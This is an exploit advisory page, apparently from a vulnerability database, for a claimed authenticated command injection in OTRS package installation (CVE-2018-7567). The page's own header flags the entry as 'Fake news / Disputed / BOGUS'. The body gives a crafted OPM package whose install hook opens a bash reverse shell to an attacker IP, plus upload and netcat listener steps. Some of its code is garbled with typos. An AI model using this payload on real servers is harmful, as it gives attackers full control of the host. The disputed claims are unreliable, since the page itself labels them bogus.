WARNING! Fake news / Disputed / BOGUS

OTRS 5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 Command Injection

2018.03.04
Credit: Ali BawazeEer
Risk: High
Local: No
Remote: Yes
CWE: CWE-78


CVSS Base Score: 9/10
Impact Subscore: 10/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: OTRS Authenticated file upload # Date: 03-03-2018 # Exploit Author: Ali BawazeEer # Vendor Homepage: https://www.otrs.com/ # Software Link: http://ftp.otrs.org/pub/otrs/ # Version:5.0.2, 5.0.0 - 5.0.24, 6.0.0 - 6.0.1 # Tested on: OTRS 5.0.2/CentOS 7.2.1511 # CVE : CVE-2018-7567 # Vulnerability Description: authenticated admins are able to exploit a Blind Remote Code Execution vulnerability by loading a crafted malicious opm file with an embedded codeinstall tag to execute a command on the server during package installation. aC/ Proof opm file to upload <?xml version="1.0" encoding="utf-8" ?> <otrs_package version="1.1"> <Name>MyModule</Name> <Version>1.0.0</Version> <Vendor>My Module</Vendor> <URL>http://otrs.org/</URL> <License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License> <ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog> <Description Lang="en">MyModule</Description> <Framework>5.x.x</Framework> <BuildDate>2016-09-23 11:17:41</BuildDate> <BuildHost>opms.otrs.com</BuildHost> <Framework>5.0.x</Framework> <IntroInstall Lang="en" Title="My Module" type="pre"> &lt;br&gt; Hello wolrd &lt;br&gt; ((Hello!)) &lt;br&gt </IntroInstall> <CodeInstall type="pre"> print qx(bash -i >& /dev/tcp/192.168.56.102/443 0>&1 &); </CodeInstall> <CodeInstall Type="post"> # create the package name my $CodeModule = 'var::packagesetup::' . $Param{Structure}-&gt;{Name}-&gt;{Content}; $Kernel::OM-&gt;Get($ModeModule)-%gt;CodeInstall(); </CodeInstall> <CodeUninstall type="pre"> my $CodeModule = 'var::packagesetup::' . $Param{Structure}-%gt;{Name}-%gt;{Content}; $Kernel::OM-&gt;Get($CodeModule)-&gt;CodeUninstall(); </CodeUninstall> </otrs_package> - Steps: - Go to package manager from administrator panel - Save the above code in opm file and upload it as package - change the ip address to your attacking machine and setup netcat listener # =================================================EOF ======================================================= # # # Risk : attackers are able to gain full access to the server after uploading malicious opm file # and thus have total control over the web server , # # Vulnerability Limitation : Admin access needed to escalate the privilege from application level to control the server # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # [+] Exploit by: Ali BawazeEer [+] Twitter:@AlibawazeEer [+] Linkedin : https://www.linkedin.com/in/AliBawazeEer


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top